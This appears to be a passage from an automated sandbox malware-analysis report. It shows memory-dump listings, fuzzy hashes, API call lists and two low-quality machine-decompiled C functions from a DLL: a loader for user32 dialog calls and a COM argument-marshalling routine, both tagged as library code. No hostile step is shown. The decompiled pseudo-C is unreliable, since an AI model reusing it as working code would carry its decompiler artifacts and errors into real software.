                                                                                                            • ReleaseDC.USER32 ref: 1002B6FF
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1002B70F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
                                                                                                            • String ID:
                                                                                                            • API String ID: 2552574679-0
                                                                                                            • Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                                                            • Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
                                                                                                            • Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                                                            • Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10019D1D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 29%
                                                                                                            			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x1004f824 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x1004f830; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x1004f828; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x1004f82c; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x1004f824(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x1004f3ec < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x1004f824 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x1004f3e0 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x1004f834 = _t26;
						if(_t26 != 0) {
							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}















                                                                                                            0x10019d24
                                                                                                            0x10019d26
                                                                                                            0x10019d2e
                                                                                                            0x10019d9d
                                                                                                            0x10019d9d
                                                                                                            0x10019da4
                                                                                                            0x10019de2
                                                                                                            0x10019de2
                                                                                                            0x10019de9
                                                                                                            0x10019ded
                                                                                                            0x10019df1
                                                                                                            0x10019df3
                                                                                                            0x10019dfa
                                                                                                            0x10019dff
                                                                                                            0x10019dff
                                                                                                            0x10019dfa
                                                                                                            0x10019df1
                                                                                                            0x10019e01
                                                                                                            0x00000000
                                                                                                            0x10019e0b
                                                                                                            0x10019da6
                                                                                                            0x10019daa
                                                                                                            0x10019dc9
                                                                                                            0x10019dd0
                                                                                                            0x10019ddc
                                                                                                            0x10019dd2
                                                                                                            0x10019dd2
                                                                                                            0x10019dd2
                                                                                                            0x00000000
                                                                                                            0x10019dd0
                                                                                                            0x10019daf
                                                                                                            0x10019db0
                                                                                                            0x10019db5
                                                                                                            0x10019db6
                                                                                                            0x10019db8
                                                                                                            0x10019dc1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019dc1
                                                                                                            0x10019d3b
                                                                                                            0x10019d3f
                                                                                                            0x10019dd8
                                                                                                            0x00000000
                                                                                                            0x10019dd8
                                                                                                            0x10019d51
                                                                                                            0x10019d55
                                                                                                            0x10019d5a
                                                                                                            0x00000000
                                                                                                            0x10019d5c
                                                                                                            0x10019d6a
                                                                                                            0x10019d78
                                                                                                            0x10019d7d
                                                                                                            0x10019d85
                                                                                                            0x10019d89
                                                                                                            0x10019d8e
                                                                                                            0x10019d98
                                                                                                            0x10019d98
                                                                                                            0x10019d8e
                                                                                                            0x00000000
                                                                                                            0x10019d7d

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
                                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                                                            • API String ID: 2238633743-1612076079
                                                                                                            • Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                                                            • Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
                                                                                                            • Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                                                            • Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10039B26 Relevance: 19.9, APIs: 13, Instructions: 395stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 48%
                                                                                                            			E10039B26(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E10011BF0(0x1003b377, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E10011C50(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E1001F77E(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E1001CE3B(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
							_t214 = 0;
						}
					}
					_t242 = 0;
					E10010592(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E10011C50(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E1001F77E(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(__eflags == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E10039A54(_t178, __eflags);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E1000860E(_t113,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E1000860E(_t117,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E1000860E(_t121,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E100387D9(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}






































                                                                                                            0x10039b2b
                                                                                                            0x10039b30
                                                                                                            0x10039b38
                                                                                                            0x10039b3b
                                                                                                            0x10039b41
                                                                                                            0x10039b45
                                                                                                            0x10039b48
                                                                                                            0x10039b55
                                                                                                            0x10039b5a
                                                                                                            0x10039b5d
                                                                                                            0x10039b62
                                                                                                            0x10039b70
                                                                                                            0x10039b64
                                                                                                            0x10039b65
                                                                                                            0x10039b6b
                                                                                                            0x10039b6b
                                                                                                            0x10039b77
                                                                                                            0x10039b7e
                                                                                                            0x10039b83
                                                                                                            0x10039b8a
                                                                                                            0x10039b8a
                                                                                                            0x10039b8f
                                                                                                            0x10039b9e
                                                                                                            0x10039ba9
                                                                                                            0x10039bac
                                                                                                            0x10039bb7
                                                                                                            0x10039bbd
                                                                                                            0x10039bc1
                                                                                                            0x10039bc4
                                                                                                            0x10039bc7
                                                                                                            0x10039bcd
                                                                                                            0x10039bd0
                                                                                                            0x10039bd3
                                                                                                            0x10039bd3
                                                                                                            0x10039bdb
                                                                                                            0x10039bde
                                                                                                            0x10039be1
                                                                                                            0x10039be2
                                                                                                            0x10039be5
                                                                                                            0x10039beb
                                                                                                            0x10039bee
                                                                                                            0x10039bf1
                                                                                                            0x10039bfb
                                                                                                            0x10039bfb
                                                                                                            0x10039bfe
                                                                                                            0x10039c06
                                                                                                            0x10039c08
                                                                                                            0x10039d38
                                                                                                            0x10039d3d
                                                                                                            0x10039d40
                                                                                                            0x10039d42
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d49
                                                                                                            0x10039d4c
                                                                                                            0x10039d4e
                                                                                                            0x10039d54
                                                                                                            0x10039d5c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d42
                                                                                                            0x10039c0e
                                                                                                            0x10039c0e
                                                                                                            0x10039d60
                                                                                                            0x10039d60
                                                                                                            0x10039d63
                                                                                                            0x10039d63
                                                                                                            0x10039d65
                                                                                                            0x10039d67
                                                                                                            0x10039d67
                                                                                                            0x10039c14
                                                                                                            0x10039c15
                                                                                                            0x10039c19
                                                                                                            0x10039c1f
                                                                                                            0x00000000
                                                                                                            0x10039c26
                                                                                                            0x10039c29
                                                                                                            0x10039c2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c54
                                                                                                            0x10039c58
                                                                                                            0x10039c5d
                                                                                                            0x10039c60
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c67
                                                                                                            0x10039c6b
                                                                                                            0x10039c70
                                                                                                            0x10039c73
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c7a
                                                                                                            0x10039c7d
                                                                                                            0x10039c7d
                                                                                                            0x10039c7f
                                                                                                            0x10039c81
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c90
                                                                                                            0x10039c93
                                                                                                            0x10039c95
                                                                                                            0x10039c97
                                                                                                            0x10039c98
                                                                                                            0x10039c9b
                                                                                                            0x10039ca1
                                                                                                            0x10039ca5
                                                                                                            0x10039ca7
                                                                                                            0x10039cad
                                                                                                            0x10039caf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039caf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d10
                                                                                                            0x10039d13
                                                                                                            0x10039d17
                                                                                                            0x10039d19
                                                                                                            0x10039c2e
                                                                                                            0x10039c2e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d20
                                                                                                            0x10039d24
                                                                                                            0x10039d27
                                                                                                            0x10039d2a
                                                                                                            0x10039d2c
                                                                                                            0x10039d2d
                                                                                                            0x10039d2e
                                                                                                            0x10039d2f
                                                                                                            0x10039d30
                                                                                                            0x10039d33
                                                                                                            0x10039d35
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039cba
                                                                                                            0x10039cba
                                                                                                            0x10039cbd
                                                                                                            0x10039cbf
                                                                                                            0x10039cc1
                                                                                                            0x10039cc3
                                                                                                            0x10039cc6
                                                                                                            0x10039ccb
                                                                                                            0x10039cd1
                                                                                                            0x10039cd2
                                                                                                            0x10039cd5
                                                                                                            0x10039cd7
                                                                                                            0x10039cda
                                                                                                            0x10039cda
                                                                                                            0x10039ce2
                                                                                                            0x10039cee
                                                                                                            0x10039cee
                                                                                                            0x10039cf3
                                                                                                            0x10039cf4
                                                                                                            0x10039cfa
                                                                                                            0x10039cfe
                                                                                                            0x10039d00
                                                                                                            0x10039d02
                                                                                                            0x10039d04
                                                                                                            0x10039cb5
                                                                                                            0x10039cb5
                                                                                                            0x00000000
                                                                                                            0x10039cb5
                                                                                                            0x10039d04
                                                                                                            0x10039d06
                                                                                                            0x10039d09
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c46
                                                                                                            0x10039c49
                                                                                                            0x10039c4d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c36
                                                                                                            0x10039c39
                                                                                                            0x10039c3c
                                                                                                            0x10039c3e
                                                                                                            0x10039c41
                                                                                                            0x10039c83
                                                                                                            0x10039c83
                                                                                                            0x10039c88
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c1f
                                                                                                            0x10039c19
                                                                                                            0x10039c0e
                                                                                                            0x10039d69
                                                                                                            0x10039d69
                                                                                                            0x10039d6d
                                                                                                            0x10039d70
                                                                                                            0x10039d79
                                                                                                            0x10039d79
                                                                                                            0x10039d82
                                                                                                            0x10039d85
                                                                                                            0x10039d85
                                                                                                            0x10039bc7
                                                                                                            0x10039d8b
                                                                                                            0x10039d8d
                                                                                                            0x10039d96
                                                                                                            0x10039d98
                                                                                                            0x10039d98
                                                                                                            0x10039da2
                                                                                                            0x10039daa
                                                                                                            0x10039dac
                                                                                                            0x10039dd2
                                                                                                            0x10039dd5
                                                                                                            0x10039dda
                                                                                                            0x10039de5
                                                                                                            0x10039de9
                                                                                                            0x10039deb
                                                                                                            0x10039ded
                                                                                                            0x10039ded
                                                                                                            0x10039df1
                                                                                                            0x10039df8
                                                                                                            0x10039df8
                                                                                                            0x10039dfe
                                                                                                            0x10039e01
                                                                                                            0x10039e02
                                                                                                            0x10039e02
                                                                                                            0x10039ded
                                                                                                            0x10039deb
                                                                                                            0x10039e07
                                                                                                            0x10039e0a
                                                                                                            0x10039e14
                                                                                                            0x10039e15
                                                                                                            0x10039ecc
                                                                                                            0x10039ecc
                                                                                                            0x10039ecf
                                                                                                            0x10039ed2
                                                                                                            0x10039ed8
                                                                                                            0x10039edc
                                                                                                            0x10039ee0
                                                                                                            0x10039ee5
                                                                                                            0x10039eeb
                                                                                                            0x10039eed
                                                                                                            0x10039eef
                                                                                                            0x10039ef5
                                                                                                            0x10039efb
                                                                                                            0x00000000
                                                                                                            0x10039efb
                                                                                                            0x10039eef
                                                                                                            0x00000000
                                                                                                            0x10039edc
                                                                                                            0x10039e1b
                                                                                                            0x10039e1f
                                                                                                            0x10039e2c
                                                                                                            0x10039e36
                                                                                                            0x10039e39
                                                                                                            0x10039e3f
                                                                                                            0x10039e3f
                                                                                                            0x10039e44
                                                                                                            0x10039e49
                                                                                                            0x10039e4a
                                                                                                            0x10039e4d
                                                                                                            0x10039e4f
                                                                                                            0x10039e52
                                                                                                            0x10039e64
                                                                                                            0x10039e64
                                                                                                            0x10039e54
                                                                                                            0x10039e54
                                                                                                            0x10039e57
                                                                                                            0x10039e59
                                                                                                            0x10039e5a
                                                                                                            0x10039e60
                                                                                                            0x10039e60
                                                                                                            0x10039e66
                                                                                                            0x10039e6a
                                                                                                            0x10039e6d
                                                                                                            0x10039e73
                                                                                                            0x10039e78
                                                                                                            0x10039e78
                                                                                                            0x10039e7b
                                                                                                            0x10039e83
                                                                                                            0x10039e83
                                                                                                            0x10039e85
                                                                                                            0x10039e88
                                                                                                            0x10039e8d
                                                                                                            0x10039e8d
                                                                                                            0x10039e90
                                                                                                            0x10039e98
                                                                                                            0x10039e98
                                                                                                            0x10039e9a
                                                                                                            0x10039e9d
                                                                                                            0x10039ea2
                                                                                                            0x10039ea2
                                                                                                            0x10039ea5
                                                                                                            0x10039ead
                                                                                                            0x10039ead
                                                                                                            0x10039eb2
                                                                                                            0x10039eb8
                                                                                                            0x10039ec4
                                                                                                            0x10039ec7
                                                                                                            0x00000000
                                                                                                            0x10039e2e
                                                                                                            0x10039e2e
                                                                                                            0x10039efc
                                                                                                            0x10039efc
                                                                                                            0x10039f01
                                                                                                            0x10039f04
                                                                                                            0x10039f0a
                                                                                                            0x10039f0c
                                                                                                            0x00000000
                                                                                                            0x10039f1d
                                                                                                            0x10039f24
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f7f
                                                                                                            0x10039f82
                                                                                                            0x10039f85
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f3c
                                                                                                            0x10039f3f
                                                                                                            0x00000000
                                                                                                            0x00000000
